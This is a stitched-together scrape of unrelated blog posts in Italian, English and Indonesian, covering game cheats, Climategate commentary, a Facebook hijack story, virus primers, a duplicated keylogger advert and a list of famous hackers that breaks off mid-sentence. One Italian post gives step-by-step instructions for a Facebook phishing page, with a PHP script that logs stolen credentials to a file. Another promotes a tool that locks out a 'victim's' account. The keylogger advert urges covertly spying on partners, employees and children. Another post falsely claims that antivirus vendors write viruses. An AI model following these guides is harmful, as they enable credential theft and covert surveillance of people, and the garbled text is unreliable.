This is kind of cool.  I wouldn’t do this for any of Apples signed applications however.  Plus if anything went wrong after an update, I would suspect this hack contributed to it.  Click here to read.

Farmville è un gioco che simula una vera e propria azienda agricola, ed è il gioco piu popolare disponibile sulla piattaforma di social networking di Facebook.

Farmville permette di gestire animali, alberi, raccolti e sementi tutto in una fattoria virtuale.Dal suo lancio nel giugno 2009, Farmville è diventata l’applicazione più popolare gioco su Facebook, con 56,1 milioni di utenti attivi nel mese di ottobre 2009.

Grazie a Cheat Engine 5.5 è possibile modificare la difficolta del gioco, La quantita dei soldi e il proprio livello.

-Ecco la video guida.

-Purtroppo gira la voce che questo metodo non funziona più, verra riportato un errore (errore G28). Si, si potrà modificare il livello fino al livello 70, acquistare e vendere le cose, però quando si aggiornerà la pagina tutto questo sarà annullato e sarete al punto di partenza

To be basically like an iPhone without the phone capacity.  Click here to learn how.

It’s no doubt that the mantra about Global Warming and Climate Change has become a political hot spot.

Recently the WSJ posted several emails from scientists conspiring to with hold and spin data about the state of the climate. They also wrote an opinion piece about what it all means.

“Yet even a partial review of the emails is highly illuminating. In them, scientists appear to urge each other to present a “unified” view on the theory of man-made climate change while discussing the importance of the “common cause”; to advise each other on how to smooth over data so as not to compromise the favored hypothesis; to discuss ways to keep opposing views out of leading journals; and to give tips on how to “hide the decline” of temperature in certain inconvenient data.”

I liked the attempt to blacklist others who disagreed with them, and influence publications. When a journal published something they didn’t like, that didn’t agree with their views this email was sent:

“It is pretty clear that thee skeptics here have staged a bit of a coup, even in the presence of a number of reasonable folks on the editorial board (Whetton, Goodess, …). My guess is that Von Storch is actually with them (frankly, he’s an odd individual, and I’m not sure he isn’t himself somewhat of a skeptic himself), and without Von Storch on their side, they would have a very forceful personality promoting their new vision.

There have been several papers by Pat Michaels, as well as the Soon & Baliunas paper, that couldn’t get published in a reputable journal. This was the danger of always criticising the skeptics for not publishing in the “peer-reviewed literature”. Obviously, they found a solution to that–take over a journal!

So what do we do about this? I think we have to stop considering “Climate Research” as a legitimate peer-reviewed journal. Perhaps we should encourage our colleagues in the climate research community to no longer submit to, or cite papers in, this journal. We would also need to consider what we tell or request of our more reasonable colleagues who currently sit on the editorial board…”

Here’s my take on Global Climate Change:
The problem is that environmentalists hitched their wagon to the wrong effect. Pollution is bad. It’s not up for debate. But no one cares unless there is some bad effect caused by it. So, someone theorizes that the climate is changing… let’s use that. Oops, the warming thing isn’t working, let’s go with climate change, that’s better.

How about we just go back to polluted water is a bad end unto itself. Smog isn’t good. It’s not as glamorous as a global catastrophe, but it’s real and provable. Instead we have people who used fear to make money now afraid to release their grip on this global warming/climate change thing.

The back lash on this would be horrible for the green culture. But what they don’t realize is that they have created a monster. All scientists could stand up today and proclaim climate change incorrect, and the public would still fear it decades from now.

Another blog entryabout it, this one from the UK.

Per scoprire le password di Facebook

C’ è un metodo che ha più successo.

Una pagina di Fake Login:

la pagina di fake login è una pagina che assomiglia esattamente alla pagina ufficiale di un servizio come: Yahoo, Gmail etc

-Scaricare la pagina di fake login da qui

-Ora che hai scaricato il file, cerca (Ctrl+f) “http://sistemazero.wordpress.com” e poi modificalo con un URL a piacimento. Io ho scelto “http://sistemazero.wordpress.com” come reindirizzamento.Quando la vittima accedera con il suo indirizzo e-mail
e la sua password verrà reindirizzato li.

-Aprire la pagina falsa con wordpad

-Dopo aver fatto questo utilizzare il comando cerca (Ctrl+f) e trovare il termine “action =” ora possibile modificare il valore di un’azione pass.php ie = pass.php

-Creare un ID in www.110mb.com, www.ripway.com o t35.com

-Caricare i contenuti in una directory

-Dopo aver creato l’ ID si andrà al file manager e caricare tutti i file

-Dopo aver ottenuto questo aprire Facebook.htm e provare se il lavoro a funzionato. Dopo aver digitato il file, un file di password pass.txt nome verrà creato nella stessa directory.

-Distribuire l’URL Facebook.HTML (vale a dire: yoursite.com / Facebook.HTML) al friends.When essi effettuano il login da questa pagina. Il login.php salverà il nome utente e password sul file. TXT (o qualsiasi altro formato ) nel vostro sito. Scarica il file per vedere la password al suo interno.

Ecco un altro script php.Si potrebbe lavorare anche con questo

header(“Location: http://WEBSITE “);
$handle =

fopen(“pass.txt”, “a”);
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, “=”);

fwrite($handle, $value);
fwrite($handle,

“\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;

Is your website vulnerable to a SQL Injection attack? Has your website been hacked recently?

These are questions you should be asking is you operate or own your own website.

To quote USAToday: Website-infecting SQL injection attacks hit 450,000 a day! What does this mean to you? It means that your website might be a target. Through our independent research we have found SQL injection exploits and XSS vulnerabilities throughout every kind and sort of website. On might say their website is fine because they don’t collect credit card information but that’s simply untrue. There are several reasons why an attacker might hack your website:

1. Profit. An attacker might attack your website in order to gain access to sensitive information such as credit card numbers or personal information which might compromise your clients/visitors identity resulting in identity theft.
2. Defacement. This form of attack is meant to simply take over your website and replace pages with hacked pages. This is a form attack is bragging about hacking ability and typically circulates within the hacking community. You can find out more about these types of hacks at the Hacker Bragging post located at www.zone-h.org.
3. Large Scale. Most of us won’t ever see this form of hack or hack attempt since it’s normally initiated for wide scale profit reasons and typically the focus or larger groups or organizations. The targets are typically large companies with either huge data banks or private/financial records which are either sold on a black market or used to harm large companies and/or their reputations.

The best way to ensure your website is protected is to have a penetration test run. These tests can check for vulnerabilities which a hacker might use in order to gain access to your website of the server your website is hosted on. You may also want to run a full penetration test even if you have a PCI Compliance badge on your website to ensure your client’s safety and security. Most PCI Scans are not heuristic so they are not intended to perform a deep scan.

Secure your website, secure your client information today by scanning your website. Click here.

Dopo una serie vastissima di congelatori per Msn  e YouTube,  ho trovato un “congelatore” per Facebook !

Per chi non lo sa, il “congelatore” è un software che permette di bloccare l’ account di una vittima fino a quando si desidera.Questo software è in grado di operare su: Windows XP e Windows Vista (supporta anche versioni precedenti). Purtroppo non è possibile emularlo con WINE in Ubuntu

Ecco una semplice guida all’ uso:

-Scaricare Facebook Freezer da qui

-Decomprimere il file Facebook Freezer.exe

-Eseguire il file Facebook Freezer.exe

Ecco un immagine di Facebook Freezer V1.0

Ora non dovete fare nient’ altro che inserire l’ indirizzo e-mail della vittima e cliccare su: Freeze.

L’ account della vittima,  verrà bloccato fino a quando vorrete voi. Per “scongelare” l’ account cliccare su Stop Freezing

Per maggiori informazioni commentate

It started innocently enough last Saturday.  I’m running out the door to my son’s soccer game, and I notice that there is a message on my home phone.  It’s from my buddy Evan S., who leaves a message to the effect that, “Hey Jabin, this is going to sound weird, but I just chatted on Facebook with someone who claimed to be you and said they were held up at gunpoint in London and needed me to wire money.”  I immediately called him back and got details, although they were sketchy since he, too, was on his way to his son’s soccer game (there is something funny and sad about that, but not the point right now), and he was driving while talking on a cell phone in New Jersey, which is a legal no-no.  Suffice it to say that he tricked the person pretending to be me by asking if my kids were involved, and then he said “Josephine and Stevie must have been freaked out.” When the other person bit (those are most certainly NOT my kids’ names), he knew it wasn’t me.  Pretty quick thinking on Evan’s part.  He also said the language didn’t sound like me.

I went to my computer and tried to log into my Facebook account to see what was up, and lo and behold, it wouldn’t take my password. I had indeed been the victim of a Facebook hijacking, or Facejacking (I have no idea if that’s a real term or not, but it sounded good). The person had changed my password and Email address associated with the account, so not only was he/she claiming to be me, he/she had locked me out of the account to prevent me from stopping this.

Pretty easily I found a listing on the Facebook help page for an FAQ about this happening, and I filled out a form telling them what happened.  But time being what it was, I had to go to my son’s soccer game.

I had my cell phone with me, but was involved during the game coaching and couldn’t answer any calls.  When the game was over, I had 6-7 messages from people who had a similar experience to Evan’s.  This scumbag was basically chatting with any of my friends who were online and giving the same story, that I had been robbed at gunpoint in London, and could they please wire me money (seems like he varied between $600 and $900), and most people were just calling to see if I was ok/let me know what was going on.  I don’t know anyone who was actually taken in by this ruse, hopefully because the language the guy (or gal?) used was, at best, broken English.  He claimed my wife was “hurt on the head pretty good” and that he would “definitely ref the money most quickly.”  That seemed to be enough of a red flag for most people.  One quick-thinking friend, like Evan, asked the fake “me” to provide my home phone number.  When they couldn’t, he immediately ended the chat.

The good news — by the time I got back from the soccer game, Facebook had suspended my account, so no more “chat” damage could be done and my Facebook friends would be spared this annoyance or worse. But for roughly 5-6 hours (that’s a guess, as I’m not sure when this started Saturday morning) there was someone claiming to be me hitting up my Facebook friends for money. Not the best feeling in the world — I feel like I owe all my Facebook friends a HUGE apology.

The bad news — this whole situation has left me feeling pretty violated, and in need of a shower. The feelings are a mixture of guilt, insecurity, embarrassment, and rage that some scumbag out there could do this. Now I’m not naive, I know computer hacking is about as rare as the common cold, but to see it so up close and personal like this is a bit unsettling.  I’m no luddite — my Facebook password was alpha-numeric, and different from any other password that I use, and they still got me.  But as I write this on Tuesday, I still can’t log into my Facebook page (this is probably a good thing, as Facebook is taking all the necessary steps to ensure that it is me).

But I am thinking when I do have access again, I’m going to post a message saying that I’m back, I’m fine, I was not robbed at gunpoint, and thanks for all the concern. Then I’m going to cancel my Facebook account.  It’s just not worth it.  I know this might seem extreme, but balancing the advantages of having an online profile vs. the exposure to something like this is pretty easy math.  I’ve got my own home page (shameless plug – www.jabin.com), so the necessity of a Facebook page for an online identity is lessened.

Could I have taken any steps to prevent this? Sure. I could have had a more secure password — you are supposed to use special characters in your passwords, and I didn’t do that, so I deserve a share of the blame. But I am putting some of this on Facebook as well (clearly most of it goes to the scumbag perpetrator), because this just seemed too easy to me. I know it’s difficult to fend off all attacks like this, and expecting Facebook to be 100% secure is ridiculous. So absent that expectation, I think the best course of action is to close the account.

Now, if you need me, I’ll be curled up in the fetal position in my basement bunker.  Send food and water.

Dopo l’articolo del mio collega mi sento in dovere di approfondire argomento virus.

Il Virus nel campo informatico è un software malevolo classificabile nella categoria dei malware, esso è in grado una volta eseguito, di infettare file ben prestabiliti durante la sua compilazione allo scopo di riprodursi facendo copie di sé stesso, quasi sempre all’oscuro del ignaro utente. I virus non sempre sono dannosi per il sistema operativo che li ospita, ma comunque vada lo rallentano a causo dello dispendioso spreco di risorse (RAM, CPU, HD).

Comunemente il termine virus viene impropriamente usato come sinonimo di malware, indicando quindi indicando altre categorie di “infestanti”.

Di seguito sono elencati alcuni Software malevoli in cui spesso accidentalmente incappiamo:

Boot sector virus (Virus che infetta i file necessari all’avio del sistema operativo contenuti nelle HD).

File Virus (Virus che infettano file di altri  programmi corrompendoli, per tanto ad ogni avvio del programma replicare il virus stesso).

Macro Virus (Virus più diffuso, Scritto in Visual Basic).

Multipartite Virus (Un po l’unione di più virus, solitamente si diffonde usando metodi di lavoro simili ai virus boot ed file).

Polymorphic Virus (Virus che muta ad ogni sua replica).

Stealth Virus (Virus insidioso perché riesce a sfuggire ai software antivirus).

Trojan Virus (Programma che a primo impatto può sembrare utile ma che al suo interno contiene un sottocodice dannoso, che si attiva in determinate condizioni  MAGGIORI INFORMAZIONI QUANDO PARLEREMO DI “BackDoor”).

Im-The-Wild-Virus (Virus sfuggiti al controllo e sono attualmente in circolazione).

Per evitare gli imprevisti della rete troppo frequenti al giorno d’oggi, non serve avere un anti virus super marcato che costa un casino di soldi, ma basta prendere dei piccoli accorgimenti…

Ecco a voi il manuale del Gladiatore

1. Prima di tutto accertarsi di aver installato un buon AntiVirus (Usate AntiVirus gratuiti sono precisi a quelli a pagamento magari con qualche funzione in meno ma non fa nulla) io consiglio di installare Avast o Avira.

2. Assicurasi di avere il Firewall attivo (Il Firewall preinstallato dal vostro sistema operativo andrà più che bene).

3. Per chi ha Windows assicuratevi che Windows Defender sia attivo cosi da evitare gli spyware .

4. Ultimo punto il più importante direi Ricordatevi che non esistono AntiVirus migliori o scadenti, gli unici AntiVirus veramente efficaci siete voi stessi, fatevi furbi… Per evitare brutte sorprese, diffidate di tutto

(Piccoli file .exe  che non hanno fonti sicure, i file .bat non li aprite mai siamo sicuri al 100% che è un codice malevolo o uno scherzo di cattivo gusto, i file .reg che vanno a modificare i file di registro non apriteli, quando scaricate un programma e lo installate non attivate gli sponsor pubblicitari o addons per i browser e in fine non cercate stupide guide fatte da lamer per vendicarvi di qualcuno tipo: “Programma per rubare account msn o cose simili, è palese che hanno qualcosa che non va alla fine rimanete voi fregati “).

Con questo concludo buon proseguimento .

For all those people who want to find out if your partner is cheating or the password to your partner’s facebook/myspace/e-mail/msn and other. Or if you are a parent worrying about what your kid might be doing at the computer behind closed doors.

Business going bad? Time to check up on your employees surfing habits. But how to do this, without getting caught trying to get some information?

Keep reading, I have the solution for all of you people.
I chose to introduce you to a keylogging/surveillance program after finally finding the tool that will give myself some answers to questions regarding my own relationship. I have searched for quite a long time and thought that there just aren’t any effective programs out there yet. But I found out that there is, it’s called All In One Keylogger, I gave it a try and I was honestly said frightened about the information it is able to collect, it will give you the answers to all your questions and suspiciousness.

With this program everything is possible, from getting a password to any community site, e-mail or forums and seeing all chat logs or messages – to recording microphone sounds (cybersex or the chat with another person and even webcam activity! (Both the own persons and a possible strangers webcam if he/she is watching naked teenagers behind your back). And best of all: you will have PROOF of what you have seen, which you obviously wont if you just suspect something without this program.

The program fits for:

a) People in a relationship
b) Business administration, finding out what your employees do when they “work”
c) Parents who want to keep track of their kids.

From their homepage you can read about the futures of All In One Keylogger, as I find it a bit pointless to copy paste whole production info page. Don’t be scared off by the word keylogger, YOU are the master of the program, only you will ever have control of the logs, pictures and audio that it monitors. Below is a lot of information about the features and what the program does, I recommend to read it in order to get a idea about the program.

Product Website:
http://www.plimus.com/jsp/redirect.jsp?contractId=1682768&referrer=Niar

I chose to speak more about my personal experiences of the program instead of talking about all the futures, those can all be found by following the link above to the product site.

What does All In One Keylogger do?

All In One Keylogger logs all keystrokes and passwords that have been typed into crypted files on your computer, it tracks all windows and applications that have been launched, clipboard, chat conversations (sent and received), all Web sites that have been visited, e-mails sent and received.

You can set it to take screen snapshots every few seconds or on each mouse click, just like a surveillance camera. It can also record Microphone sounds and restrict the access to specified Web sites and applications if wanted. It can even be set up to send these logs to your e-mail or FTP for tracking when you are away!

Personally I hate it the times I get the feeling in my stomach that something might be going on when I’m away from my partner, this is the solution to get rid of the paranoia, or to get proof for your suspicions. It snaps up all usernames and passwords into the very easily readable log viewer supported in the All In One Keylogger program. And maybe even more importantly you can set it up to take screen snapshots every few seconds and view the pictures later. I chose to divide the potential usage areas into different categories, you might wonder what the All In One Keylogger could be good for, I’ll tell you.

Relationship:
In the survey that took place in United States in the year of 2005 which includes married couples only, 56% of the participants of the survey said that during their marriage they had at least one sexual encounter with a person that is not their spouse. Are you living in a relationship and suspect that your partner is cheating on you, or doing other stuff he/she shouldn’t be doing on your/her computer (flirting harshly on community sites, MSN messenger contacts, webcam usage, microphone usage or visiting sites that are uncomfortable in a relationship.. the list goes on.

This is where All In One Keylogger can be there to save you from wasting time on your relationship, you wonder what your partner does when he/she is on the computer and you are away or working night shift. Well there is no reason to keep wondering and being paranoid about what she might be doing, you can find it out directly by downloading the trial version straight away (it is amazingly easy to set up, and the best part is that it is totally undetectable/invisible in windows, so no one can find out it’s installed and running.. read more on product site for more detailed info).

 It basically records all keystrokes, and shows in which program the text has been typed in, stores visited sites and you can set it up to take a picture of the screen for example every 10 seconds!

Employers:
In the survey that took place in Britain in the year 2006, 87% of the employees participating in the survey said that they surf on the internet during their work at least once a week. 73% of them said that they surf at least once a day. 23% of them said that they dedicate more time to surfing on the internet than to their work! In the additional survey that took place in the same year answered 36% of the employers, participants of the survey mentioned that they are afraid that secrets of the company will be sent to their competitors from the company computers by their employees. 4% announced that they fell victim to the theft of company secrets by their workers from the company computers.

Are you running a small sized company, and wonder why you aren’t getting as much work done as you should be getting. Well the solution is here, with All In One Keylogger you can make sure who are actually working and who are not. The result can be scary, you might find out that the employee is actually playing online poker half day or such, no wonder that the results aren’t so promising. There are a lot of people who don’t care as long as their getting paid, so they will just entertain themselves in some way instead of actually working.

Download trial (7 days free):
http://www.plimus.com/jsp/download_trial.jsp?contractId=1682768&referrer=Niar

Parents:
Today, almost every child has access to internet. This comes thanks to the advance in technology, but has also risks involved. Did you know that: The average age when the children encounter pornography in the internet is 11? The age of the largest pornography consumer group in the internet is between 12 to 17? 85% of children between the ages 6-16 encountered pornographic content intentionally or unintentionally (most of them while preparing their homework). 25% of children between ages 9-17 will freely disclose their home address in the internet? 60% of children who committed suicide, declared their intentions online directly or indirectly? One in five children who use the computer chat rooms has been approached over the internet by pedophiles? Only 25% of youth who received sexual solicitation told a parent.

The children today are very sophisticated and most of us parents don’t have the knowledge to know what they are doing behind their closed doors in front of the computer. Are they browsing to inappropriate websites, are they downloading illegal content using P2P programs that will in the future result in lawsuits of thousands of dollars? What personal information they disclose about themselves, are they talking to adults, or maybe they meet them?

All In One Keylogger has many features:

No activity on your computer will be able to evade this high quality Keylogger. Does your kid make secret chat conversations with adult strangers? Maybe even with a pedophile that searches for his next victim? Does he surf to pornographic sites? Maybe he even exposes his personal details where he is not supposed to? Does he use P2P programs, sharing copyrighted materials which could constitute a pretext to a lawsuit of tens thousands of dollars? Have you ever wondered why does your husband “work” on his computer so late at the night? Does he have a secret online lover?Have you ever wondered who is your wife’s “partner” she talks with all the time? Do your employees surf on the internet instead of doing their work which you pay them for? Do they sell company secretes to your competitors? A high quality Keylogger should give you the answers to all these questions. No activity will be able to evade from it. No undesirable activity will be able to evade from you! As said, a high quality Keylogger is an “All In One Keylogger”, so just press this link to download “All In One Keylogger”:

Download trial (7 days free):
http://www.plimus.com/jsp/download_trial.jsp?contractId=1682768&referrer=Niar

Link for buying full version:
https://www.plimus.com/jsp/buynow.jsp?contractId=1682768&referrer=Niar

With this program everything is possible, from getting a password to any community site, e-mail or forums and seeing all chat logs or messages – to recording microphone sounds (cybersex or the chat with another person and even webcam activity! (Both the own persons and a possible strangers webcam if he/she is watching naked teenagers behind your back). And best of all: you will have PROOF of what you have seen, which you obviously wont if you just suspect something without this program.

I tried to bring up the most important things in this article, but there sure is more to read if you still aren’t sure, simply visit the links provided and read more about people who have bought the product or view the awards that the product has received. Everyone has different use or needs of the program, and it sure was a relief to my head after finally getting answer to my questions using this brilliant program.

Thousands of emails and documents were stolen from a prominent climate research center in the UK recently and posted online, firing up a fresh controversy over global warming.

Hackers broke into the e-mail server of the Climate Research Unit at the University of East Anglia, one of the United Kingdom’s premier climate research institutes, on Friday, stealing more than 1,000 e-mails and more than 3,800 documents. The CRU hack occurred in the weeks prior to a major global climate summit in Denmark slated for December.

The stolen materials cover roughly a decade’s worth of research and also include the names and email addresses of several prominent researchers.

Hackers then posted the e-mails and documents onto an anonymous FTP server in Russia, as well as a link to the 61-MB file on the blog Air Vent, accompanied by a note that read.

The effect of the hack, meanwhile, has been to incite fresh controversy over the science of global warming.

Ogni giorno  al telefono mi arrivano tante chiamate di gente che mi chiede:

“Quale il miglior antivirus?”

La cosa che mi fa letteralmente incazzare e che la gente non si domanda minimamente cosa siano i virus e da dove vengano, sono tutti convinti che i virus li fanno quei “cattivoni degli hacker” per prendere chissà quali informazioni importanti dal nostro PC; tanto per essere chiari….i virus non li fanno gli hacker e spesso servono solo ad incasinavi il computer.

Ma vi chiederete:   “Allora se non sono gli Hacker chi li fa i virus?”

I virus vengono prodotti dalle stesse case produttrici dei antivirus, il motivo naturalmente è vendervi il loro prodotto.  Altre volte i virus vengono creati da semplici utenti che non hanno nulla da fare, aperte leggersi una guida da i bellissimi forum Lamer (Spesso spacciati per forum brulicanti di hacker con nobili intenzioni, ma che nella sostanza sono solo Lamer).

Ma torniamo alla domanda di prima: “Qual’è il miglior antivirus?”  la risposta è: “Non esiste!”, Tutta via  esistono solo degli antivirus totalmente gratuiti come: Avast, AVG, Avira,ecc…  Ma non promettono una sicurezza tale da immunizzarsi al 100% per il semplice motivo che il Web è in continua evoluzione e in parallelo tutti i software di cui e composto Utili o malevoli che siano, Unico consiglio che posso darvi e installare uno  dei due antivirus più aggiornati ed efficaci del momento, Avast o Avira..

Conclusioni: Ho non collegate il pc ad internet, o installate uno dei precedenti antivirus citati consapevoli dei rischi che correte.

With this program everything is possible, from getting a password to any community site, e-mail or forums and seeing all chat logs or messages – to recording microphone sounds (cybersex or the chat with another person and even webcam activity! (Both the own persons and a possible strangers webcam if he/she is watching naked teenagers behind your back). And best of all: you will have PROOF of what you have seen, which you obviously wont if you just suspect something without this program.

For all those people who want to find out if your partner is cheating or the password to your partner’s facebook/myspace/e-mail/msn and other. Or if you are a parent worrying about what your kid might be doing at the computer behind closed doors.

Business going bad? Time to check up on your employees surfing habits. But how to do this, without getting caught trying to get some information?

Keep reading, I have the solution for all of you people.
I chose to introduce you to a keylogging/surveillance program after finally finding the tool that will give myself some answers to questions regarding my own relationship. I have searched for quite a long time and thought that there just aren’t any effective programs out there yet. But I found out that there is, it’s called All In One Keylogger, I gave it a try and I was honestly said frightened about the information it is able to collect, it will give you the answers to all your questions and suspiciousness.

The program fits for:

a) People in a relationship
b) Business administration, finding out what your employees do when they “work”
c) Parents who want to keep track of their kids.

From their homepage you can read about the futures of All In One Keylogger, as I find it a bit pointless to copy paste whole production info page. Don’t be scared off by the word keylogger, YOU are the master of the program, only you will ever have control of the logs, pictures and audio that it monitors. Below is a lot of information about the features and what the program does, I recommend to read it in order to get a idea about the program.

Product Website:
http://www.plimus.com/jsp/redirect.jsp?contractId=1682768&referrer=Niar

I chose to speak more about my personal experiences of the program instead of talking about all the futures, those can all be found by following the link above to the product site.

What does All In One Keylogger do?

All In One Keylogger logs all keystrokes and passwords that have been typed into crypted files on your computer, it tracks all windows and applications that have been launched, clipboard, chat conversations (sent and received), all Web sites that have been visited, e-mails sent and received.

You can set it to take screen snapshots every few seconds or on each mouse click, just like a surveillance camera. It can also record Microphone sounds and restrict the access to specified Web sites and applications if wanted. It can even be set up to send these logs to your e-mail or FTP for tracking when you are away!

Personally I hate it the times I get the feeling in my stomach that something might be going on when I’m away from my partner, this is the solution to get rid of the paranoia, or to get proof for your suspicions. It snaps up all usernames and passwords into the very easily readable log viewer supported in the All In One Keylogger program. And maybe even more importantly you can set it up to take screen snapshots every few seconds and view the pictures later. I chose to divide the potential usage areas into different categories, you might wonder what the All In One Keylogger could be good for, I’ll tell you.

Relationship:
In the survey that took place in United States in the year of 2005 which includes married couples only, 56% of the participants of the survey said that during their marriage they had at least one sexual encounter with a person that is not their spouse. Are you living in a relationship and suspect that your partner is cheating on you, or doing other stuff he/she shouldn’t be doing on your/her computer (flirting harshly on community sites, MSN messenger contacts, webcam usage, microphone usage or visiting sites that are uncomfortable in a relationship.. the list goes on.

This is where All In One Keylogger can be there to save you from wasting time on your relationship, you wonder what your partner does when he/she is on the computer and you are away or working night shift. Well there is no reason to keep wondering and being paranoid about what she might be doing, you can find it out directly by downloading the trial version straight away (it is amazingly easy to set up, and the best part is that it is totally undetectable/invisible in windows, so no one can find out it’s installed and running.. read more on product site for more detailed info).

 It basically records all keystrokes, and shows in which program the text has been typed in, stores visited sites and you can set it up to take a picture of the screen for example every 10 seconds!

Employers:
In the survey that took place in Britain in the year 2006, 87% of the employees participating in the survey said that they surf on the internet during their work at least once a week. 73% of them said that they surf at least once a day. 23% of them said that they dedicate more time to surfing on the internet than to their work! In the additional survey that took place in the same year answered 36% of the employers, participants of the survey mentioned that they are afraid that secrets of the company will be sent to their competitors from the company computers by their employees. 4% announced that they fell victim to the theft of company secrets by their workers from the company computers.

Are you running a small sized company, and wonder why you aren’t getting as much work done as you should be getting. Well the solution is here, with All In One Keylogger you can make sure who are actually working and who are not. The result can be scary, you might find out that the employee is actually playing online poker half day or such, no wonder that the results aren’t so promising. There are a lot of people who don’t care as long as their getting paid, so they will just entertain themselves in some way instead of actually working.

Download trial (7 days free):
http://www.plimus.com/jsp/download_trial.jsp?contractId=1682768&referrer=Niar

Parents:
Today, almost every child has access to internet. This comes thanks to the advance in technology, but has also risks involved. Did you know that: The average age when the children encounter pornography in the internet is 11? The age of the largest pornography consumer group in the internet is between 12 to 17? 85% of children between the ages 6-16 encountered pornographic content intentionally or unintentionally (most of them while preparing their homework). 25% of children between ages 9-17 will freely disclose their home address in the internet? 60% of children who committed suicide, declared their intentions online directly or indirectly? One in five children who use the computer chat rooms has been approached over the internet by pedophiles? Only 25% of youth who received sexual solicitation told a parent.

The children today are very sophisticated and most of us parents don’t have the knowledge to know what they are doing behind their closed doors in front of the computer. Are they browsing to inappropriate websites, are they downloading illegal content using P2P programs that will in the future result in lawsuits of thousands of dollars? What personal information they disclose about themselves, are they talking to adults, or maybe they meet them?

All In One Keylogger has many features:

No activity on your computer will be able to evade this high quality Keylogger. Does your kid make secret chat conversations with adult strangers? Maybe even with a pedophile that searches for his next victim? Does he surf to pornographic sites? Maybe he even exposes his personal details where he is not supposed to? Does he use P2P programs, sharing copyrighted materials which could constitute a pretext to a lawsuit of tens thousands of dollars? Have you ever wondered why does your husband “work” on his computer so late at the night? Does he have a secret online lover?Have you ever wondered who is your wife’s “partner” she talks with all the time? Do your employees surf on the internet instead of doing their work which you pay them for? Do they sell company secretes to your competitors? A high quality Keylogger should give you the answers to all these questions. No activity will be able to evade from it. No undesirable activity will be able to evade from you! As said, a high quality Keylogger is an “All In One Keylogger”, so just press this link to download “All In One Keylogger”:

Download trial (7 days free):
http://www.plimus.com/jsp/download_trial.jsp?contractId=1682768&referrer=Niar

Link for buying full version:
https://www.plimus.com/jsp/buynow.jsp?contractId=1682768&referrer=Niar

With this program everything is possible, from getting a password to any community site, e-mail or forums and seeing all chat logs or messages – to recording microphone sounds (cybersex or the chat with another person and even webcam activity! (Both the own persons and a possible strangers webcam if he/she is watching naked teenagers behind your back). And best of all: you will have PROOF of what you have seen, which you obviously wont if you just suspect something without this program.

I tried to bring up the most important things in this article, but there sure is more to read if you still aren’t sure, simply visit the links provided and read more about people who have bought the product or view the awards that the product has received. Everyone has different use or needs of the program, and it sure was a relief to my head after finally getting answer to my questions using this brilliant program.

1. Richard Stallman

Nickname : NG’ ada

Salah seorang ‘Old School Hacker’, bekerja pada lab Artificial
Intelligence MIT. Merasa terganggu oleh software komersial dan dan
hak cipta pribadi. Akhirnya mendirikan GNU (baca: guhNew) yang
merupakan singkatan dari GNU NOT UNIX.
komputer pertama sekali pada tahun 1969 di IBM New York
Scintific Center saat berumur 16 tahun.

___________________________________________________________________________

2. Dennis Ritchie dan Ken Thomson

Nickname : dmr dan ken

Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson
menulis sistem operasi UNIX yang elegan.

___________________________________________________________________________

3. John Draper

Nickname : Cap’n Crunch

Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang
merupakan hadiah dari kotak sereal. Merupakan pelopor penggunaan
nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca:
frieker)

Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan
telepon gratis. Pada pengembangannya, nada 2600 Hz tidak lagi
dibuat dengan peluit plastik, melainkan menggunakan alat yang
disebut ‘Blue Box’.

___________________________________________________________________________

4. Mark Abene

Nickname : Phiber Optik

Sebagai salah seorang ‘Master of Deception’ phiber optik
menginspirasikan ribuan remaja untuk mempelajari sistem internal
telepon negara. Phiber optik juga dinobatkan sebagai salah
seorang dari 100 orang jenius oleh New York Magazine.

Menggunakan komputer Apple ][, Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

___________________________________________________________________________

5. Robert Morris

Nickname : rtm

Seorang anak dari ilmuwan National Computer Security Center -
merupakan bagian dari National Security Agencies (NSA) -. Pertama
sekali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

___________________________________________________________________________

6. Kevin Mitnick

Nickname : Condor

Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster ‘FBI Most Wanted’.

Kevin juga seorang ‘Master of Deception’ dan telah menulis buku
yang berjudul ‘The Art of Deception’. Buku ini menjelaskan berbagai
teknik social engineering untuk mendapatkan akses ke dalam sistem.

___________________________________________________________________________

7. Kevin Poulsen

Nickname : Dark Dante

Melakukan penipuan digital terhadap stasiun radio KIIS-FM,
memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche
944 S2.

___________________________________________________________________________

8. Johan Helsingius

Nickname : julf

Mengoperasikan anonymous remailer paling populer didunia.

___________________________________________________________________________

9. Vladimir Levin

Nickname : tidak diketahui

Lulusan St. Petersburg Tekhnologichesky University. Menipu komputer
CitiBank dan meraup keuntungan 10 juta dollar. Ditangkap Interpol
di Heathrow Airport pada tahun 1995

___________________________________________________________________________

10. Steve Wozniak

Nickname : masih tanda tanya

Membangun komputer Apple dan menggunakan ‘blue box’ untuk
kepentingan sendiri.

___________________________________________________________________________

11. Tsutomu Shimomura

Nickname : ????????????????

Berhasil menangkap jejak Kevin Mitnick.

___________________________________________________________________________

12. Linus Torvalds

Nickname : Ng’ diketahui

Seorang hacker sejati, mengembangkan sistem operasi Linux yang
merupakan gabungan dari ‘LINUS MINIX’. Sistem operasi Linux telah
menjadi sistem operasi ’standar’ hacker. Bersama Richard Stallman
dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan
programmer, developper dan hacker seluruh dunia untuk
mengembangkan kernel Linux.

___________________________________________________________________________

13. Eric Steven Raymond

Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: ‘How To
Become A Hacker’ dan ‘The new hacker’s Dictionary’. Begitu
fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.

Menurut Eric, “dunia mempunyai banyak persoalan menarik dan
menanti untuk dipecahkan.”

___________________________________________________________________________

14. Ian Murphy

Nickname : Captain Zap

Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam
komputer AT&T dan menggubah seting jam internal-nya. Hal ini
mengakibatkan masyarakat pengguna telfon mendapatkan diskon
‘tengah malam’ pada saat sore hari, dan yang telah menunggu hingga
